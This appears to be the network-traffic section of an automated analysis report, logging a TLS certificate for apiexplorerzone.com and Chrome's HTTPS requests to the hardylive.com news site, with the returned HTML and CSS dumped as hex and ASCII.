                                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                        Mar 11, 2025 19:02:38.103689909 CET46.173.214.32443192.168.2.449747CN=apiexplorerzone.com CN=E6, O=Let's Encrypt, C=USCN=E6, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USMon Feb 10 19:51:16 CET 2025 Wed Mar 13 01:00:00 CET 2024Sun May 11 20:51:15 CEST 2025 Sat Mar 13 00:59:59 CET 2027771,4865-4866-4867-49195-49199-49196-49200-52393-52392-49171-49172-156-157-47-53,51-13-65281-23-27-65037-0-35-11-16-5-45-18-17613-43-10,4588-29-23-24,0c302ba96bc6e46e33548786bd64820e5
                                                        CN=E6, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USWed Mar 13 01:00:00 CET 2024Sat Mar 13 00:59:59 CET 2027
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.449731198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:26 UTC663OUTGET / HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.449735198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:29 UTC663OUTGET / HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:31 UTC372INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Link: <https://hardylive.com/wp-json/>; rel="https://api.w.org/", <https://hardylive.com/wp-json/wp/v2/pages/12010>; rel="alternate"; title="JSON"; type="application/json", <https://hardylive.com/>; rel=shortlink
                                                        2025-03-11 18:02:31 UTC16012INData Raw: 32 33 65 31 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 20 6c 74 2d 69 65 37 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 61 72 74 69 63 6c 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 61 72 74 69 63 6c 65 23 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74
                                                        Data Ascii: 23e10<!doctype html>...[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en-US" prefix="og: http://ogp.me/ns# article: http://ogp.me/ns/article#"> <![endif]-->...[if IE 7]> <html class="no-js lt-ie9 lt-ie8" lang="en-US" prefix="og: htt
                                                        2025-03-11 18:02:31 UTC16384INData Raw: 74 2d 2d 73 68 61 64 6f 77 2d 2d 64 65 65 70 3a 20 31 32 70 78 20 31 32 70 78 20 35 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 34 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 73 68 61 72 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6f 75 74 6c 69 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 63 72 69 73 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28
                                                        Data Ascii: t--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(
                                                        2025-03-11 18:02:31 UTC16384INData Raw: 39 2f 31 31 2f 63 72 6f 70 70 65 64 2d 48 61 72 64 79 4c 69 76 65 32 30 31 39 2d 4c 6f 67 6f 2d 33 32 78 33 32 2e 6a 70 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 61 67 65 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 73 74 61 74 65 6c 65 73 73 2d 6d 6f 75 6e 74 61 69 6e 6d 65 64 69 61 6e 65 77 73 2d 63 6f 2f 73 69 74 65 73 2f 33 35 2f 32 30 31 39 2f 31 31 2f 63 72 6f 70 70 65 64 2d 48 61 72 64 79 4c 69 76 65 32 30 31 39 2d 4c 6f 67 6f 2d 31 39 32 78 31 39 32 2e 6a 70 67 22 20 73 69 7a 65 73 3d 22 31 39 32 78 31 39 32 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d
                                                        Data Ascii: 9/11/cropped-HardyLive2019-Logo-32x32.jpg" sizes="32x32" /><link rel="icon" href="https://storage.googleapis.com/stateless-mountainmedianews-co/sites/35/2019/11/cropped-HardyLive2019-Logo-192x192.jpg" sizes="192x192" /><link rel="apple-touch-icon" href=
                                                        2025-03-11 18:02:31 UTC16384INData Raw: 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 65 67 5f 6e 61 76 62 61 72 5f 6d 6f 62 69 6c 65 5f 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 65 67 5f 6e 61 76 62 61 72 5f 6d 6f 62 69 6c 65 22 20 64 61 74 61 2d 6d 6f 64 65 3d 22 73 63 72 6f 6c 6c 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 65 67 5f 6d 6f 62 69 6c 65 5f 62 6f 74 74 6f 6d 62 61 72 20 6a 65 67 5f 6d 6f 62 69 6c 65 5f 6d 69 64 62 61 72 20 6a 65 67 5f 63 6f 6e
                                                        Data Ascii: v> </div></div> </div> </div></div> </div> <div class="jeg_navbar_mobile_wrapper"> <div class="jeg_navbar_mobile" data-mode="scroll"> <div class="jeg_mobile_bottombar jeg_mobile_midbar jeg_con
                                                        2025-03-11 18:02:31 UTC16384INData Raw: 72 65 63 74 69 6f 6e 22 3a 22 69 6e 22 2c 22 5f 6d 61 73 6b 5f 73 77 69 74 63 68 22 3a 22 22 2c 22 5f 6d 61 73 6b 5f 6e 6f 74 69 63 65 22 3a 22 22 2c 22 68 69 64 65 5f 64 65 73 6b 74 6f 70 22 3a 22 22 2c 22 68 69 64 65 5f 74 61 62 6c 65 74 22 3a 22 22 2c 22 68 69 64 65 5f 6d 6f 62 69 6c 65 22 3a 22 22 2c 22 70 61 67 65 64 22 3a 31 2c 22 63 6f 6c 75 6d 6e 5f 63 6c 61 73 73 22 3a 22 6a 65 67 5f 63 6f 6c 5f 32 6f 33 22 2c 22 63 6c 61 73 73 22 3a 22 6a 6e 65 77 73 5f 62 6c 6f 63 6b 5f 33 22 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65
                                                        Data Ascii: rection":"in","_mask_switch":"","_mask_notice":"","hide_desktop":"","hide_tablet":"","hide_mobile":"","paged":1,"column_class":"jeg_col_2o3","class":"jnews_block_3"};</script></div></div></div><div class="elementor-element elementor-ele
                                                        2025-03-11 18:02:32 UTC16384INData Raw: 3a 22 70 78 22 2c 22 73 69 7a 65 22 3a 22 22 2c 22 73 69 7a 65 73 22 3a 5b 5d 7d 2c 22 5f 74 72 61 6e 73 66 6f 72 6d 5f 73 6b 65 77 59 5f 65 66 66 65 63 74 5f 68 6f 76 65 72 5f 74 61 62 6c 65 74 22 3a 7b 22 75 6e 69 74 22 3a 22 64 65 67 22 2c 22 73 69 7a 65 22 3a 22 22 2c 22 73 69 7a 65 73 22 3a 5b 5d 7d 2c 22 5f 74 72 61 6e 73 66 6f 72 6d 5f 73 6b 65 77 59 5f 65 66 66 65 63 74 5f 68 6f 76 65 72 5f 6d 6f 62 69 6c 65 22 3a 7b 22 75 6e 69 74 22 3a 22 64 65 67 22 2c 22 73 69 7a 65 22 3a 22 22 2c 22 73 69 7a 65 73 22 3a 5b 5d 7d 2c 22 5f 74 72 61 6e 73 66 6f 72 6d 5f 66 6c 69 70 58 5f 65 66 66 65 63 74 5f 68 6f 76 65 72 22 3a 22 22 2c 22 5f 74 72 61 6e 73 66 6f 72 6d 5f 66 6c 69 70 59 5f 65 66 66 65 63 74 5f 68 6f 76 65 72 22 3a 22 22 2c 22 5f 62 61 63 6b 67
                                                        Data Ascii: :"px","size":"","sizes":[]},"_transform_skewY_effect_hover_tablet":{"unit":"deg","size":"","sizes":[]},"_transform_skewY_effect_hover_mobile":{"unit":"deg","size":"","sizes":[]},"_transform_flipX_effect_hover":"","_transform_flipY_effect_hover":"","_backg
                                                        2025-03-11 18:02:32 UTC16384INData Raw: 63 74 5f 74 61 62 6c 65 74 22 3a 7b 22 75 6e 69 74 22 3a 22 70 78 22 2c 22 73 69 7a 65 22 3a 22 22 2c 22 73 69 7a 65 73 22 3a 5b 5d 7d 2c 22 5f 74 72 61 6e 73 66 6f 72 6d 5f 70 65 72 73 70 65 63 74 69 76 65 5f 65 66 66 65 63 74 5f 6d 6f 62 69 6c 65 22 3a 7b 22 75 6e 69 74 22 3a 22 70 78 22 2c 22 73 69 7a 65 22 3a 22 22 2c 22 73 69 7a 65 73 22 3a 5b 5d 7d 2c 22 5f 74 72 61 6e 73 66 6f 72 6d 5f 74 72 61 6e 73 6c 61 74 65 5f 70 6f 70 6f 76 65 72 22 3a 22 22 2c 22 5f 74 72 61 6e 73 66 6f 72 6d 5f 74 72 61 6e 73 6c 61 74 65 58 5f 65 66 66 65 63 74 22 3a 7b 22 75 6e 69 74 22 3a 22 70 78 22 2c 22 73 69 7a 65 22 3a 22 22 2c 22 73 69 7a 65 73 22 3a 5b 5d 7d 2c 22 5f 74 72 61 6e 73 66 6f 72 6d 5f 74 72 61 6e 73 6c 61 74 65 58 5f 65 66 66 65 63 74 5f 74 61 62 6c 65
                                                        Data Ascii: ct_tablet":{"unit":"px","size":"","sizes":[]},"_transform_perspective_effect_mobile":{"unit":"px","size":"","sizes":[]},"_transform_translate_popover":"","_transform_translateX_effect":{"unit":"px","size":"","sizes":[]},"_transform_translateX_effect_table
                                                        2025-03-11 18:02:32 UTC16384INData Raw: 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 65 67 5f 62 6c 6f 63 6b 5f 6e 61 76 69 67 61 74 69 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 6e 61 76 69 67 61 74 69 6f 6e 5f 6f 76 65 72 6c 61 79 27 3e 3c 64 69 76 20 63 6c 61 73 73 3d 27 6d 6f 64 75 6c 65 2d 70 72 65 6c 6f 61 64 65 72 20 6a 65 67 5f 70 72 65 6c 6f 61 64 65 72 27 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: v></div> </div> <div class="jeg_block_navigation"> <div class='navigation_overlay'><div class='module-preloader jeg_preloader'><span></span><span></span><span></span></div></div>
                                                        2025-03-11 18:02:32 UTC16384INData Raw: 2d 6a 6e 65 77 73 2d 31 32 30 78 38 36 20 73 69 7a 65 2d 6a 6e 65 77 73 2d 31 32 30 78 38 36 20 6c 61 7a 79 6c 6f 61 64 20 77 70 2d 70 6f 73 74 2d 69 6d 61 67 65 20 77 70 2d 73 74 61 74 65 6c 65 73 73 2d 69 74 65 6d 22 20 61 6c 74 3d 22 4a 75 6e 69 6f 72 20 48 61 72 64 79 20 48 61 72 64 77 6f 6f 64 20 42 6f 79 73 20 52 75 6c 65 20 50 56 6c 3a 20 45 61 73 74 20 48 61 72 64 79 20 37 74 68 20 61 6e 64 20 4d 6f 6f 72 65 66 69 65 6c 64 20 38 74 68 20 67 72 61 64 65 20 74 65 61 6d 73 20 63 6c 61 69 6d 20 74 69 74 6c 65 73 22 20 73 69 7a 65 73 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 30 70 78 29 20 31 30 30 76 77 2c 20 31 32 30 70 78 22 20 64 61 74 61 2d 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 61 67 65 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f
                                                        Data Ascii: -jnews-120x86 size-jnews-120x86 lazyload wp-post-image wp-stateless-item" alt="Junior Hardy Hardwood Boys Rule PVl: East Hardy 7th and Moorefield 8th grade teams claim titles" sizes="(max-width: 120px) 100vw, 120px" data-src="https://storage.googleapis.co
                                                        2025-03-11 18:02:32 UTC16384INData Raw: 3e 0a 09 09 09 09 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 6e 65 77 73 5f 70 72 65 6c 6f 61 64 65 72 5f 63 69 72 63 6c 65 5f 6f 75 74 65 72 22 3e 0a 09 09 09 09 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 6e 65 77 73 5f 70 72 65 6c 6f 61 64 65 72 5f 63 69 72 63 6c 65 5f 69 6e 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 09 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 09 09 09 09 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 09 09 09 09 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 2d 70 72 65 6c 6f 61 64 65 72 20 6a 65 67 5f 70 72 65 6c 6f 61 64 65 72 20 73 71 75 61 72 65 22 3e 0a 09 09 09 09 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69
                                                        Data Ascii: > <div class="jnews_preloader_circle_outer"> <div class="jnews_preloader_circle_inner"></div> </div> </div> <div class="module-preloader jeg_preloader square"> <di


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.449744198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:34 UTC626OUTGET /wp-content/plugins/ajax-login-and-registration-modal-popup/assets/lrm-core-compiled.css?ver=56 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:35 UTC205INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:33 GMT
                                                        Content-Type: text/css
                                                        Content-Length: 27851
                                                        Connection: close
                                                        Last-Modified: Wed, 18 Dec 2024 14:55:36 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:35 UTC16179INData Raw: 2f 2a 21 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 20 20 20 20 50 75 62 6c 69 63 20 73 74 79 6c 65 73 20 66 6f 72 20 4c 52 4d 0a 20 20 20 20 43 6f 6d 70 69 6c 65 64 20 66 72 6f 6d 20 53 43 53 53 0a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 2a 2f 0a 2f 2a 20 6d 6f 64 61 6c 2e 73 63 73 73 20 2a 2f 0a 2e 6c 72 6d 2d 75 73 65 72 2d 6d 6f 64 61 6c 20 7b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0a 20 20 74 6f 70 3a 20 30 3b 0a 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 35
                                                        Data Ascii: /*! ==================================== Public styles for LRM Compiled from SCSS====================================*//* modal.scss */.lrm-user-modal { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(5
                                                        2025-03-11 18:02:35 UTC11672INData Raw: 67 68 74 3a 20 31 70 78 3b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 7d 0a 0a 2e 6a 65 74 70 61 63 6b 2d 73 73 6f 2d 6f 72 20 73 70 61 6e 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 20 38 70 78 3b 0a 20 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 75 70 70 65 72 63 61 73 65 3b 0a 7d 0a 0a 2e 6a 65 74 70 61 63 6b 2d 73 73 6f 2e 62 75 74 74 6f 6e 20 7b 0a 20 20 68 65 69 67 68 74 3a 20 33 36 70 78 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a
                                                        Data Ascii: ght: 1px; position: absolute; left: 0; top: 50%; width: 100%;}.jetpack-sso-or span { background: #fff; color: #777; position: relative; padding: 0 8px; text-transform: uppercase;}.jetpack-sso.button { height: 36px; line-height:


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.449739198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:34 UTC620OUTGET /wp-content/plugins/ajax-login-and-registration-modal-popup/skins/default/skin.css?ver=56 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:35 UTC204INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:33 GMT
                                                        Content-Type: text/css
                                                        Content-Length: 2057
                                                        Connection: close
                                                        Last-Modified: Wed, 18 Dec 2024 14:55:36 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:35 UTC2057INData Raw: 2e 6c 72 6d 2d 69 6e 6c 69 6e 65 20 2e 6c 72 6d 2d 75 73 65 72 2d 6d 6f 64 61 6c 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 64 32 64 38 64 38 3b 20 7d 0a 0a 2e 6c 72 6d 2d 75 73 65 72 2d 6d 6f 64 61 6c 2d 63 6f 6e 74 61 69 6e 65 72 2d 69 6e 6e 65 72 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 32 35 65 6d 3b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 7d 0a 0a 0a 2f 2a 20 54 41 42 53 20 2a 2f 0a 2e 6c 72 6d 2d 75 73 65 72 2d 6d 6f 64 61 6c 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 20 78 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 32 35 65 6d 3b 20 7d 0a 2e 6c 72 6d 2d 75 73 65 72 2d 6d 6f 64 61 6c 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 6c 72 6d 2d 73
                                                        Data Ascii: .lrm-inline .lrm-user-modal-container { border: 2px solid #d2d8d8; }.lrm-user-modal-container-inner { border-radius: 0.25em; overflow: hidden;}/* TABS */.lrm-user-modal-container { x-border-radius: 0.25em; }.lrm-user-modal-container .lrm-s


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.449740198.12.251.684435708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-11 18:02:34 UTC597OUTGET /wp-content/plugins/mailster/build/form/style-index.css?ver=0b25e1 HTTP/1.1
                                                        Host: hardylive.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://hardylive.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-11 18:02:35 UTC205INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Tue, 11 Mar 2025 18:02:33 GMT
                                                        Content-Type: text/css
                                                        Content-Length: 23023
                                                        Connection: close
                                                        Last-Modified: Thu, 07 Nov 2024 20:30:05 GMT
                                                        Accept-Ranges: bytes
                                                        2025-03-11 18:02:35 UTC16179INData Raw: 68 74 6d 6c 2e 6d 61 69 6c 73 74 65 72 2d 66 6f 72 6d 2d 61 63 74 69 76 65 2c 68 74 6d 6c 2e 6d 61 69 6c 73 74 65 72 2d 66 6f 72 6d 2d 61 63 74 69 76 65 20 62 6f 64 79 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 6f 64 79 2e 73 69 6e 67 6c 65 2d 6d 61 69 6c 73 74 65 72 2d 66 6f 72 6d 20 23 77 70 61 64 6d 69 6e 62 61 72 2c 62 6f 64 79 2e 73 69 6e 67 6c 65 2d 6d 61 69 6c 73 74 65 72 2d 66 6f 72 6d 20 23 77 70 61 64 6d 69 6e 62 61 72 20 2a 7b 5f 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 62 6f 64 79 2e 73 69 6e 67 6c 65 2d 6d 61 69 6c 73 74 65 72 2d 66 6f 72 6d 3a 61 66 74 65 72 2c 62 6f 64 79 2e 73 69 6e 67 6c 65 2d 6d 61 69 6c 73 74 65 72 2d 66 6f 72 6d 3a 62 65 66 6f 72 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 62 6f 64 79 2e 73
                                                        Data Ascii: html.mailster-form-active,html.mailster-form-active body{overflow:hidden}body.single-mailster-form #wpadminbar,body.single-mailster-form #wpadminbar *{_visibility:visible}body.single-mailster-form:after,body.single-mailster-form:before{display:none}body.s
